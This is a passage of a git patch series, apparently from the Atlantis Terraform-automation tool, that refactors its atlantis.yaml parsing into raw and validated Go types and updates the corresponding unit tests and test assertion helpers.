[]yaml.Project{ + { + Dir: String("mydir"), + Workspace: String("myworkspace"), + Workflow: String("default"), + TerraformVersion: String("v0.11.0"), + AutoPlan: &yaml.AutoPlan{ + WhenModified: []string{}, + Enabled: Bool(false), + }, + ApplyRequirements: []string{"mergeable"}, + }, + }, + Workflows: map[string]yaml.Workflow{ + "default": { + Apply: &yaml.Stage{ + Steps: []yaml.Step{}, + }, + Plan: &yaml.Stage{ + Steps: []yaml.Step{}, + }, + }, + }, + }, + }, + } + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + var conf yaml.Spec + err := yamlv2.UnmarshalStrict([]byte(c.input), &conf) + if c.expErr != "" { + ErrEquals(t, c.expErr, err) + return + } + Ok(t, err) + Equals(t, c.exp, conf) + }) + } +} diff --git a/server/events/yaml/stage.go b/server/events/yaml/stage.go index 7c84323b55..be342403f6 100644 --- a/server/events/yaml/stage.go +++ b/server/events/yaml/stage.go @@ -1,5 +1,5 @@ package yaml type Stage struct { - Steps []StepConfig `yaml:"steps"` // can either be a built in step like 'plan' or a custom step like 'run: echo hi' + Steps []Step `yaml:"steps,omitempty"` } diff --git a/server/events/yaml/stage_test.go b/server/events/yaml/stage_test.go new file mode 100644 index 0000000000..ffcebe1a5a --- /dev/null +++ b/server/events/yaml/stage_test.go @@ -0,0 +1,47 @@ +package yaml_test + +import ( + "testing" + + "github.com/runatlantis/atlantis/server/events/yaml" + . 
"github.com/runatlantis/atlantis/testing" + yamlv2 "gopkg.in/yaml.v2" +) + +func TestStage_UnmarshalYAML(t *testing.T) { + cases := []struct { + description string + input string + exp yaml.Stage + }{ + { + description: "empty", + input: "", + exp: yaml.Stage{ + Steps: nil, + }, + }, + { + description: "all fields set", + input: ` +steps: [step1] +`, + exp: yaml.Stage{ + Steps: []yaml.Step{ + { + Key: String("step1"), + }, + }, + }, + }, + } + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + var a yaml.Stage + err := yamlv2.UnmarshalStrict([]byte(c.input), &a) + Ok(t, err) + Equals(t, c.exp, a) + }) + } +} diff --git a/server/events/yaml/step.go b/server/events/yaml/step.go new file mode 100644 index 0000000000..f8c09d9bc0 --- /dev/null +++ b/server/events/yaml/step.go @@ -0,0 +1,61 @@ +package yaml + +// Step represents a single action/command to perform. In YAML, it can be set as +// 1. A single string for a built-in command: +// - init +// - plan +// 2. A map for a built-in command and extra_args: +// - plan: +// extra_args: [-var-file=staging.tfvars] +// 3. A map for a custom run command: +// - run: my custom command +// Here we parse step in the most generic fashion possible. See fields for more +// details. +type Step struct { + // Key will be set in case #1 and #3 above to the key. In case #2, there + // could be multiple keys (since the element is a map) so we don't set Key. + Key *string + // Map will be set in case #2 above. + Map map[string]map[string][]string + // StringVal will be set in case #3 above. + StringVal map[string]string +} + +func (s *Step) UnmarshalYAML(unmarshal func(interface{}) error) error { + // First try to unmarshal as a single string, ex. + // steps: + // - init + // - plan + // We validate if it's a legal string later. 
+ var singleString string + err := unmarshal(&singleString) + if err == nil { + s.Key = &singleString + return nil + } + + // This represents a step with extra_args, ex: + // init: + // extra_args: [a, b] + // We validate if there's a single key in the map and if the value is a + // legal value later. + var step map[string]map[string][]string + err = unmarshal(&step) + if err == nil { + s.Map = step + return nil + } + + // Try to unmarshal as a custom run step, ex. + // steps: + // - run: my command + // We validate if the key is run later. + var runStep map[string]string + err = unmarshal(&runStep) + if err == nil { + s.StringVal = runStep + return nil + } + + return err +} diff --git a/server/events/yaml/step_config.go b/server/events/yaml/step_config.go deleted file mode 100644 index f6e7713c0f..0000000000 --- a/server/events/yaml/step_config.go +++ /dev/null @@ -1,82 +0,0 @@ -package yaml - -import ( - "fmt" - - "github.com/flynn-archive/go-shlex" - "github.com/pkg/errors" -) - -type StepConfig struct { - StepType string - ExtraArgs []string - // Run will be set if the StepType is "run". This is for custom commands. - // Ex. if the key is `run: echo hi` then Run will be "echo hi". - Run []string -} - -func (s *StepConfig) UnmarshalYAML(unmarshal func(interface{}) error) error { - // First try to unmarshal as a single string, ex. 
- // steps: - // - init - // - plan - var singleString string - err := unmarshal(&singleString) - if err == nil { - if singleString != "init" && singleString != "plan" && singleString != "apply" { - return fmt.Errorf("unsupported step type: %q", singleString) - } - s.StepType = singleString - return nil - } - - // This represents a step with extra_args, ex: - // init: - // extra_args: [a, b] - var step map[string]map[string][]string - if err = unmarshal(&step); err == nil { - if len(step) != 1 { - return errors.New("each step can have only one map key, you probably have something like:\nsteps:\n - key1: val\n key2: val") - } - - for k, v := range step { - if k != "init" && k != "plan" && k != "apply" { - return fmt.Errorf("unsupported step %q", k) - } - - extraArgs, ok := v["extra_args"] - if !ok { - return errors.New("the only supported key for a step is 'extra_args'") - } - - s.StepType = k - s.ExtraArgs = extraArgs - return nil - } - } - - // Try to unmarshal as a custom run step, ex. - // steps: - // - run: my command - var runStep map[string]string - if err = unmarshal(&runStep); err == nil { - if len(runStep) != 1 { - return errors.New("each step can have only one map key, you probably have something like:\nsteps:\n - key1: val\n key2: val") - } - - for k, v := range runStep { - if k != "run" { - return fmt.Errorf("unsupported step %q", k) - } - - s.StepType = "run" - parts, err := shlex.Split(v) - if err != nil { - return err - } - s.Run = parts - } - } - - return err -} diff --git a/server/events/yaml/step_config_test.go b/server/events/yaml/step_config_test.go deleted file mode 100644 index c75777ba53..0000000000 --- a/server/events/yaml/step_config_test.go +++ /dev/null @@ -1,159 +0,0 @@ -package yaml_test - -import ( - "testing" - - "github.com/runatlantis/atlantis/server/events/yaml" - . 
"github.com/runatlantis/atlantis/testing" - yamlv2 "gopkg.in/yaml.v2" -) - -func TestStepConfig_UnmarshalYAML(t *testing.T) { - cases := []struct { - description string - input string - exp yaml.StepConfig - expErr string - }{ - - //Single string. - { - description: "should parse just init", - input: `init`, - exp: yaml.StepConfig{ - StepType: "init", - }, - }, - { - description: "should parse just plan", - input: `plan`, - exp: yaml.StepConfig{ - StepType: "plan", - }, - }, - { - description: "should parse just apply", - input: `apply`, - exp: yaml.StepConfig{ - StepType: "apply", - }, - }, - - // With extra_args. - { - description: "should parse init with extra_args", - input: ` -init: - extra_args: [arg1, arg2]`, - exp: yaml.StepConfig{ - StepType: "init", - ExtraArgs: []string{"arg1", "arg2"}, - }, - }, - { - description: "should parse plan with extra_args", - input: ` -plan: - extra_args: [arg1, arg2]`, - exp: yaml.StepConfig{ - StepType: "plan", - ExtraArgs: []string{"arg1", "arg2"}, - }, - }, - { - description: "should parse apply with extra_args", - input: ` -apply: - extra_args: [arg1, arg2]`, - exp: yaml.StepConfig{ - StepType: "apply", - ExtraArgs: []string{"arg1", "arg2"}, - }, - }, - - // extra_args with non-strings. - { - description: "should convert non-string extra_args into strings", - input: ` -init: - extra_args: [1]`, - exp: yaml.StepConfig{ - StepType: "init", - ExtraArgs: []string{"1"}, - }, - }, - { - description: "should convert non-string extra_args into strings", - input: ` -plan: - extra_args: [true]`, - exp: yaml.StepConfig{ - StepType: "plan", - ExtraArgs: []string{"true"}, - }, - }, - - // Custom run step. 
- { - description: "should allow for custom run steps", - input: ` -run: echo my command`, - exp: yaml.StepConfig{ - StepType: "run", - Run: []string{"echo", "my", "command"}, - }, - }, - { - description: "should split words correctly in run step", - input: ` -run: echo 'my command'`, - exp: yaml.StepConfig{ - StepType: "run", - Run: []string{"echo", "my command"}, - }, - }, - - // Invalid steps - { - description: "should error when element is a map", - input: ` -key1: val -key2: val`, - expErr: "each step can have only one map key, you probably have something like:\nsteps:\n - key1: val\n key2: val", - }, - { - description: "should error when unrecognized step is used", - input: ` -invalid: val -`, - expErr: "unsupported step \"invalid\"", - }, - { - description: "should error when unrecognized step is used", - input: ` -invalid: - extra_args: [] -`, - expErr: "unsupported step \"invalid\"", - }, - { - description: "should error when unrecognized step is used", - input: ` -run: []`, - expErr: "yaml: unmarshal errors:\n line 2: cannot unmarshal !!seq into string", - }, - } - - for _, c := range cases { - t.Run(c.description, func(t *testing.T) { - var got yaml.StepConfig - err := yamlv2.Unmarshal([]byte(c.input), &got) - if c.expErr != "" { - ErrEquals(t, c.expErr, err) - return - } - Ok(t, err) - Equals(t, c.exp, got) - }) - } -} diff --git a/server/events/yaml/step_test.go b/server/events/yaml/step_test.go new file mode 100644 index 0000000000..4bdb6f33ec --- /dev/null +++ b/server/events/yaml/step_test.go @@ -0,0 +1,134 @@ +package yaml_test + +import ( + "testing" + + "github.com/runatlantis/atlantis/server/events/yaml" + . "github.com/runatlantis/atlantis/testing" + yamlv2 "gopkg.in/yaml.v2" +) + +func TestStepConfig_UnmarshalYAML(t *testing.T) { + cases := []struct { + description string + input string + exp yaml.Step + expErr string + }{ + + // Single string. 
+ { + description: "single string", + input: `astring`, + exp: yaml.Step{ + Key: String("astring"), + }, + }, + + // map[string]map[string][]string i.e. extra_args style. + { + description: "extra_args style", + input: ` +key: + mapValue: [arg1, arg2]`, + exp: yaml.Step{ + Map: map[string]map[string][]string{ + "key": { + "mapValue": {"arg1", "arg2"}, + }, + }, + }, + }, + { + description: "extra_args style multiple keys", + input: ` +key: + mapValue: [arg1, arg2] + value2: []`, + exp: yaml.Step{ + Map: map[string]map[string][]string{ + "key": { + "mapValue": {"arg1", "arg2"}, + "value2": {}, + }, + }, + }, + }, + { + description: "extra_args style multiple top-level keys", + input: ` +key: + val1: [] +key2: + val2: []`, + exp: yaml.Step{ + Map: map[string]map[string][]string{ + "key": { + "val1": {}, + }, + "key2": { + "val2": {}, + }, + }, + }, + }, + + // Run-step style + { + description: "run step", + input: ` +run: my command`, + exp: yaml.Step{ + StringVal: map[string]string{ + "run": "my command", + }, + }, + }, + { + description: "run step multiple top-level keys", + input: ` +run: my command +key: value`, + exp: yaml.Step{ + StringVal: map[string]string{ + "run": "my command", + "key": "value", + }, + }, + }, + + // Empty + { + description: "empty", + input: "", + exp: yaml.Step{ + Key: nil, + Map: nil, + StringVal: nil, + }, + }, + + // Errors + { + description: "extra args style no slice strings", + input: ` +key: + value: + another: map`, + expErr: "yaml: unmarshal errors:\n line 3: cannot unmarshal !!map into string", + }, + } + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + var got yaml.Step + err := yamlv2.UnmarshalStrict([]byte(c.input), &got) + if c.expErr != "" { + ErrEquals(t, c.expErr, err) + return + } + Ok(t, err) + Equals(t, c.exp, got) + }) + } +} diff --git a/server/events/yaml/workflow.go b/server/events/yaml/workflow.go index 97055cb3da..0dd069c648 100644 --- a/server/events/yaml/workflow.go +++ 
b/server/events/yaml/workflow.go @@ -1,60 +1,6 @@ package yaml -import "errors" - type Workflow struct { - Apply *Stage `yaml:"apply"` // defaults to regular apply steps - Plan *Stage `yaml:"plan"` // defaults to regular plan steps -} - -func (p *Workflow) UnmarshalYAML(unmarshal func(interface{}) error) error { - // Check if they forgot to set the "steps" key and just started listing - // steps, ex. - // plan: - // - init - // - plan - type MissingSteps struct { - Apply []interface{} - Plan []interface{} - } - var missingSteps MissingSteps - // This will pass if they've just set the key to null, which we don't want - // since in that case we use the defaults to we also check if the len > 0. - if err := unmarshal(&missingSteps); err == nil && (len(missingSteps.Apply) > 0 || len(missingSteps.Plan) > 0) { - return errors.New("missing \"steps\" key") - } - - // Use a type alias so unmarshal doesn't get into an infinite loop. - type alias Workflow - var tmp alias - if err := unmarshal(&tmp); err != nil { - return err - } - *p = Workflow(tmp) - - // If plan or apply keys aren't specified we use the default workflow. 
- if p.Apply == nil { - p.Apply = &Stage{ - []StepConfig{ - { - StepType: "apply", - }, - }, - } - } - - if p.Plan == nil { - p.Plan = &Stage{ - []StepConfig{ - { - StepType: "init", - }, - { - StepType: "plan", - }, - }, - } - } - - return nil + Apply *Stage `yaml:"apply,omitempty"` + Plan *Stage `yaml:"plan,omitempty"` } diff --git a/server/events/yaml/workflow_test.go b/server/events/yaml/workflow_test.go index dd299799e4..c2dcbb34f8 100644 --- a/server/events/yaml/workflow_test.go +++ b/server/events/yaml/workflow_test.go @@ -16,102 +16,70 @@ func TestWorkflow_UnmarshalYAML(t *testing.T) { expErr string }{ { - description: "should use defaults if set to null", + description: "empty", + input: ``, + exp: yaml.Workflow{ + Apply: nil, + Plan: nil, + }, + }, + { + description: "yaml null", input: `~`, exp: yaml.Workflow{ - Apply: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "apply", - }, - }, - }, - Plan: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "init", - }, - { - StepType: "plan", - }, - }, - }, + Apply: nil, + Plan: nil, }, }, { - description: "should use set values", + description: "only plan/apply set", input: ` plan: - steps: - - plan apply: - steps: [] `, exp: yaml.Workflow{ - Apply: &yaml.Stage{ - Steps: []yaml.StepConfig{}, - }, - Plan: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "plan", - }, - }, - }, + Apply: nil, + Plan: nil, }, }, { - description: "should use defaults for apply if only plan set", + description: "steps set to null", input: ` plan: - steps: []`, + steps: ~ +apply: + steps: ~`, exp: yaml.Workflow{ - Apply: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "apply", - }, - }, - }, Plan: &yaml.Stage{ - Steps: []yaml.StepConfig{}, + Steps: nil, + }, + Apply: &yaml.Stage{ + Steps: nil, }, }, }, { - description: "should use defaults for plan if only apply set", + description: "steps set to empty slice", input: ` +plan: + steps: [] apply: steps: []`, exp: yaml.Workflow{ - Apply: &yaml.Stage{ - 
Steps: []yaml.StepConfig{}, - }, Plan: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "init", - }, - { - StepType: "plan", - }, - }, + Steps: []yaml.Step{}, + }, + Apply: &yaml.Stage{ + Steps: []yaml.Step{}, }, }, }, - { - description: "should error if no steps key specified", - input: ` -apply: -- apply`, - expErr: "missing \"steps\" key", - }, } for _, c := range cases { t.Run(c.description, func(t *testing.T) { var w yaml.Workflow - err := yamlv2.Unmarshal([]byte(c.input), &w) + err := yamlv2.UnmarshalStrict([]byte(c.input), &w) if c.expErr != "" { ErrEquals(t, c.expErr, err) return diff --git a/server/events/yaml/yaml_test.go b/server/events/yaml/yaml_test.go new file mode 100644 index 0000000000..c82dd3486b --- /dev/null +++ b/server/events/yaml/yaml_test.go @@ -0,0 +1,13 @@ +package yaml_test + +// Bool is a helper routine that allocates a new bool value +// to store v and returns a pointer to it. +func Bool(v bool) *bool { return &v } + +// Int is a helper routine that allocates a new int value +// to store v and returns a pointer to it. +func Int(v int) *int { return &v } + +// String is a helper routine that allocates a new string value +// to store v and returns a pointer to it. 
+func String(v string) *string { return &v } diff --git a/testing/assertions.go b/testing/assertions.go index 5b6ad147bd..d66266824e 100644 --- a/testing/assertions.go +++ b/testing/assertions.go @@ -20,6 +20,7 @@ import ( "strings" "testing" + "github.com/davecgh/go-spew/spew" "github.com/go-test/deep" ) @@ -49,8 +50,7 @@ func Equals(tb testing.TB, exp, act interface{}) { tb.Helper() if diff := deep.Equal(exp, act); diff != nil { _, file, line, _ := runtime.Caller(1) - fmt.Printf("\033[31m%s:%d:\n\n\texp: %#v\n\n\tgot: %#v\033[39m\n\n", filepath.Base(file), line, exp, act) - tb.Fatal(diff) + tb.Fatalf("\033[31m%s:%d: %s\n\nexp: %s******\ngot: %s\033[39m\n", filepath.Base(file), line, diff, spew.Sdump(exp), spew.Sdump(act)) } } @@ -58,10 +58,10 @@ func Equals(tb testing.TB, exp, act interface{}) { func ErrEquals(tb testing.TB, exp string, act error) { tb.Helper() if act == nil { - tb.Fatalf("exp err %q but err was nil", exp) + tb.Fatalf("exp err %q but err was nil\n", exp) } if act.Error() != exp { - tb.Fatalf("exp err: %q but got: %q", exp, act.Error()) + tb.Fatalf("exp err: %q but got: %q\n", exp, act.Error()) } } From d70e57e87bb876f49b16ea45107e51891e52782f Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Wed, 13 Jun 2018 13:54:04 +0100 Subject: [PATCH 20/69] Yaml parsing and validation. 
--- server/events/execution_planner.go | 16 +- server/events/markdown_renderer.go | 2 +- server/events/yaml/auto_plan.go | 6 - server/events/yaml/auto_plan_test.go | 69 -- server/events/yaml/parser_validator.go | 61 +- server/events/yaml/parser_validator_test.go | 1049 +++++++++-------- server/events/yaml/project.go | 10 - server/events/yaml/project_test.go | 63 - server/events/yaml/raw/autoplan.go | 39 + server/events/yaml/raw/autoplan_test.go | 151 +++ server/events/yaml/raw/project.go | 70 ++ server/events/yaml/raw/project_test.go | 178 +++ server/events/yaml/raw/raw.go | 4 + .../yaml/{yaml_test.go => raw/raw_test.go} | 2 +- server/events/yaml/raw/spec.go | 45 + server/events/yaml/raw/spec_test.go | 268 +++++ server/events/yaml/raw/stage.go | 26 + server/events/yaml/raw/stage_test.go | 103 ++ server/events/yaml/raw/step.go | 195 +++ server/events/yaml/raw/step_test.go | 387 ++++++ server/events/yaml/raw/workflow.go | 31 + server/events/yaml/raw/workflow_test.go | 168 +++ server/events/yaml/spec.go | 7 - server/events/yaml/spec_test.go | 152 --- server/events/yaml/stage.go | 5 - server/events/yaml/stage_test.go | 47 - server/events/yaml/step.go | 61 - server/events/yaml/step_test.go | 134 --- server/events/yaml/valid/valid.go | 41 + server/events/yaml/workflow.go | 6 - server/events/yaml/workflow_test.go | 91 -- server/events/yaml/yaml.go | 4 - 32 files changed, 2306 insertions(+), 1185 deletions(-) delete mode 100644 server/events/yaml/auto_plan.go delete mode 100644 server/events/yaml/auto_plan_test.go delete mode 100644 server/events/yaml/project.go delete mode 100644 server/events/yaml/project_test.go create mode 100644 server/events/yaml/raw/autoplan.go create mode 100644 server/events/yaml/raw/autoplan_test.go create mode 100644 server/events/yaml/raw/project.go create mode 100644 server/events/yaml/raw/project_test.go create mode 100644 server/events/yaml/raw/raw.go rename server/events/yaml/{yaml_test.go => raw/raw_test.go} (95%) create mode 100644 
server/events/yaml/raw/spec.go create mode 100644 server/events/yaml/raw/spec_test.go create mode 100644 server/events/yaml/raw/stage.go create mode 100644 server/events/yaml/raw/stage_test.go create mode 100644 server/events/yaml/raw/step.go create mode 100644 server/events/yaml/raw/step_test.go create mode 100644 server/events/yaml/raw/workflow.go create mode 100644 server/events/yaml/raw/workflow_test.go delete mode 100644 server/events/yaml/spec.go delete mode 100644 server/events/yaml/spec_test.go delete mode 100644 server/events/yaml/stage.go delete mode 100644 server/events/yaml/stage_test.go delete mode 100644 server/events/yaml/step.go delete mode 100644 server/events/yaml/step_test.go create mode 100644 server/events/yaml/valid/valid.go delete mode 100644 server/events/yaml/workflow.go delete mode 100644 server/events/yaml/workflow_test.go delete mode 100644 server/events/yaml/yaml.go diff --git a/server/events/execution_planner.go b/server/events/execution_planner.go index 415ed2da18..4b13ce2190 100644 --- a/server/events/execution_planner.go +++ b/server/events/execution_planner.go @@ -9,6 +9,7 @@ import ( "github.com/runatlantis/atlantis/server/events/models" "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/yaml" + "github.com/runatlantis/atlantis/server/events/yaml/valid" "github.com/runatlantis/atlantis/server/logging" ) @@ -75,7 +76,7 @@ func (s *ExecutionPlanner) BuildAutoplanStages(log *logging.SimpleLogger, repoFu // Else we run plan according to the config file. 
var stages []runtime.PlanStage for _, p := range config.Projects { - if s.shouldAutoplan(p.AutoPlan, modifiedFiles) { + if s.shouldAutoplan(p.Autoplan, modifiedFiles) { // todo stages = append(stages) } @@ -83,7 +84,7 @@ func (s *ExecutionPlanner) BuildAutoplanStages(log *logging.SimpleLogger, repoFu return stages, nil } -func (s *ExecutionPlanner) shouldAutoplan(autoplan yaml.AutoPlan, modifiedFiles []string) bool { +func (s *ExecutionPlanner) shouldAutoplan(autoplan valid.Autoplan, modifiedFiles []string) bool { return true } @@ -118,15 +119,16 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge // Get this project's configuration. for _, p := range config.Projects { if p.Dir == relProjectPath && p.Workspace == workspace { - workflowName := p.Workflow + workflowNamePtr := p.Workflow // If they didn't specify a workflow, use the default. - if workflowName == "" { + if workflowNamePtr == nil { log.Info("no %s workflow set––continuing with defaults", AtlantisYAMLFilename) return defaults, nil } // If they did specify a workflow, find it. + workflowName := *workflowNamePtr workflow, exists := config.Workflows[workflowName] if !exists { return nil, fmt.Errorf("no workflow with key %q defined", workflowName) @@ -135,7 +137,7 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge // We have a workflow defined, so now we need to build it. 
meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) var steps []runtime.Step - var stepsConfig []yaml.Step + var stepsConfig []valid.Step if stageName == PlanStageName { stepsConfig = workflow.Plan.Steps } else { @@ -143,7 +145,7 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge } for _, stepConfig := range stepsConfig { var step runtime.Step - switch stepConfig.Key { + switch stepConfig.StepName { case "init": step = &runtime.InitStep{ Meta: meta, @@ -162,7 +164,7 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge case "run": step = &runtime.RunStep{ Meta: meta, - Commands: stepConfig.StringVal, + Commands: stepConfig.RunCommand, } } steps = append(steps, step) diff --git a/server/events/markdown_renderer.go b/server/events/markdown_renderer.go index f91a45a1f1..4094c3861c 100644 --- a/server/events/markdown_renderer.go +++ b/server/events/markdown_renderer.go @@ -125,7 +125,7 @@ var singleProjectTmpl = template.Must(template.New("").Parse("{{$result := index var multiProjectTmpl = template.Must(template.New("").Funcs(sprig.TxtFuncMap()).Parse( "Ran {{.Command}} for {{ len .Results }} projects:\n" + "{{ range $result := .Results }}" + - "1. path: `{{$result.Dir}} workspace: `{{$result.Workspace}}`\n" + + "1. workspace: `{{$result.Workspace}}` path: `{{$result.Dir}}`\n" + "{{end}}\n" + "{{ range $i, $result := .Results }}" + "### {{add $i 1}}. 
workspace: `{{$result.Workspace}}` path: `{{$result.Dir}}`\n" + diff --git a/server/events/yaml/auto_plan.go b/server/events/yaml/auto_plan.go deleted file mode 100644 index 00eb0cc79d..0000000000 --- a/server/events/yaml/auto_plan.go +++ /dev/null @@ -1,6 +0,0 @@ -package yaml - -type AutoPlan struct { - WhenModified []string `yaml:"when_modified,omitempty"` - Enabled *bool `yaml:"enabled,omitempty"` -} diff --git a/server/events/yaml/auto_plan_test.go b/server/events/yaml/auto_plan_test.go deleted file mode 100644 index 04d517d94f..0000000000 --- a/server/events/yaml/auto_plan_test.go +++ /dev/null @@ -1,69 +0,0 @@ -package yaml_test - -import ( - "testing" - - "github.com/runatlantis/atlantis/server/events/yaml" - . "github.com/runatlantis/atlantis/testing" - yamlv2 "gopkg.in/yaml.v2" -) - -func TestAutoPlan_UnmarshalYAML(t *testing.T) { - cases := []struct { - description string - input string - exp yaml.AutoPlan - }{ - { - description: "omit unset fields", - input: "", - exp: yaml.AutoPlan{ - Enabled: nil, - WhenModified: nil, - }, - }, - { - description: "all fields set", - input: ` -enabled: true -when_modified: ["something-else"] -`, - exp: yaml.AutoPlan{ - Enabled: Bool(true), - WhenModified: []string{"something-else"}, - }, - }, - { - description: "enabled false", - input: ` -enabled: false -when_modified: ["something-else"] -`, - exp: yaml.AutoPlan{ - Enabled: Bool(false), - WhenModified: []string{"something-else"}, - }, - }, - { - description: "modified elem empty", - input: ` -enabled: false -when_modified: -- -`, - exp: yaml.AutoPlan{ - Enabled: Bool(false), - WhenModified: []string{""}, - }, - }, - } - - for _, c := range cases { - t.Run(c.description, func(t *testing.T) { - var a yaml.AutoPlan - err := yamlv2.UnmarshalStrict([]byte(c.input), &a) - Ok(t, err) - Equals(t, c.exp, a) - }) - } -} diff --git a/server/events/yaml/parser_validator.go b/server/events/yaml/parser_validator.go index f824737404..8dc895d132 100644 --- 
a/server/events/yaml/parser_validator.go +++ b/server/events/yaml/parser_validator.go @@ -1,11 +1,15 @@ package yaml import ( + "fmt" "io/ioutil" "os" "path/filepath" + "github.com/go-ozzo/ozzo-validation" "github.com/pkg/errors" + "github.com/runatlantis/atlantis/server/events/yaml/raw" + "github.com/runatlantis/atlantis/server/events/yaml/valid" "gopkg.in/yaml.v2" ) @@ -17,50 +21,57 @@ type ParserValidator struct{} // ReadConfig returns the parsed and validated atlantis.yaml config for repoDir. // If there was no config file, then this can be detected by checking the type // of error: os.IsNotExist(error). -func (r *ParserValidator) ReadConfig(repoDir string) (Spec, error) { +func (r *ParserValidator) ReadConfig(repoDir string) (valid.Spec, error) { configFile := filepath.Join(repoDir, AtlantisYAMLFilename) configData, err := ioutil.ReadFile(configFile) // NOTE: the error we return here must also be os.IsNotExist since that's // what our callers use to detect a missing config file. if err != nil && os.IsNotExist(err) { - return Spec{}, err + return valid.Spec{}, err } // If it exists but we couldn't read it return an error. if err != nil { - return Spec{}, errors.Wrapf(err, "unable to read %s file", AtlantisYAMLFilename) + return valid.Spec{}, errors.Wrapf(err, "unable to read %s file", AtlantisYAMLFilename) } // If the config file exists, parse it. 
config, err := r.parseAndValidate(configData) if err != nil { - return Spec{}, errors.Wrapf(err, "parsing %s", AtlantisYAMLFilename) + return valid.Spec{}, errors.Wrapf(err, "parsing %s", AtlantisYAMLFilename) } return config, err } -func (r *ParserValidator) parseAndValidate(configData []byte) (Spec, error) { - var repoConfig Spec - if err := yaml.UnmarshalStrict(configData, &repoConfig); err != nil { - return repoConfig, err +func (r *ParserValidator) parseAndValidate(configData []byte) (valid.Spec, error) { + var rawSpec raw.Spec + if err := yaml.UnmarshalStrict(configData, &rawSpec); err != nil { + return valid.Spec{}, err } - // Validate version. - //if repoConfig.Version != 2 { - // // todo: this will fail old atlantis.yaml files, we should deal with them in a better way. - // return repoConfig, errors.New("unknown version: must have \"version: 2\" set") - //} - // - //// Validate projects. - //if len(repoConfig.Projects) == 0 { - // return repoConfig, errors.New("'projects' key must exist and contain at least one element") - //} - // - //for i, project := range repoConfig.Projects { - // if project.Dir == "" { - // return repoConfig, fmt.Errorf("project at index %d invalid: dir key must be set and non-empty", i) - // } - //} - return repoConfig, nil + // Set ErrorTag to yaml so it uses the YAML field names in error messages. + validation.ErrorTag = "yaml" + + if err := rawSpec.Validate(); err != nil { + return valid.Spec{}, err + } + + // Top level validation. 
+ for _, p := range rawSpec.Projects { + if p.Workflow != nil { + workflow := *p.Workflow + found := false + for k := range rawSpec.Workflows { + if k == workflow { + found = true + } + } + if !found { + return valid.Spec{}, fmt.Errorf("workflow %q is not defined", workflow) + } + } + } + + return rawSpec.ToValid(), nil } diff --git a/server/events/yaml/parser_validator_test.go b/server/events/yaml/parser_validator_test.go index 3081970892..51fa1ca702 100644 --- a/server/events/yaml/parser_validator_test.go +++ b/server/events/yaml/parser_validator_test.go @@ -1,498 +1,555 @@ package yaml_test -//func TestReadConfig_DirDoesNotExist(t *testing.T) { -// r := yaml.ParserValidator{} -// _, err := r.ReadConfig("/not/exist") -// Assert(t, os.IsNotExist(err), "exp nil ptr") -//} -// -//func TestReadConfig_FileDoesNotExist(t *testing.T) { -// tmpDir, cleanup := TempDir(t) -// defer cleanup() -// -// r := yaml.ParserValidator{} -// _, err := r.ReadConfig(tmpDir) -// Assert(t, os.IsNotExist(err), "exp nil ptr") -//} -// -//func TestReadConfig_BadPermissions(t *testing.T) { -// tmpDir, cleanup := TempDir(t) -// defer cleanup() -// err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), nil, 0000) -// Ok(t, err) -// -// r := yaml.ParserValidator{} -// _, err = r.ReadConfig(tmpDir) -// ErrContains(t, "unable to read atlantis.yaml file: ", err) -//} -// -//func TestReadConfig_UnmarshalErrors(t *testing.T) { -// // We only have a few cases here because we assume the YAML library to be -// // well tested. See https://github.com/go-yaml/yaml/blob/v2/decode_test.go#L810. 
-// cases := []struct { -// description string -// input string -// expErr string -// }{ -// { -// "random characters", -// "slkjds", -// "parsing atlantis.yaml: yaml: unmarshal errors:\n line 1: cannot unmarshal !!str `slkjds` into yaml.Spec", -// }, -// { -// "just a colon", -// ":", -// "parsing atlantis.yaml: yaml: did not find expected key", -// }, -// } -// -// tmpDir, cleanup := TempDir(t) -// defer cleanup() -// -// for _, c := range cases { -// t.Run(c.description, func(t *testing.T) { -// err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) -// Ok(t, err) -// r := yaml.ParserValidator{} -// _, err = r.ReadConfig(tmpDir) -// ErrEquals(t, c.expErr, err) -// }) -// } -//} -// -//func TestReadConfig_Invalid(t *testing.T) { -// cases := []struct { -// description string -// input string -// expErr string -// }{ -// // Invalid version. -// { -// description: "no version", -// input: ` -//projects: -//- dir: "." -//`, -// expErr: "unknown version: must have \"version: 2\" set", -// }, -// { -// description: "unsupported version", -// input: ` -//version: 0 -//projects: -//- dir: "." -//`, -// expErr: "unknown version: must have \"version: 2\" set", -// }, -// { -// description: "empty version", -// input: ` -//version: ~ -//projects: -//- dir: "." -//`, -// expErr: "unknown version: must have \"version: 2\" set", -// }, -// -// // No projects specified. -// { -// description: "no projects key", -// input: `version: 2`, -// expErr: "'projects' key must exist and contain at least one element", -// }, -// { -// description: "empty projects list", -// input: ` -//version: 2 -//projects:`, -// expErr: "'projects' key must exist and contain at least one element", -// }, -// -// // Project must have dir set. 
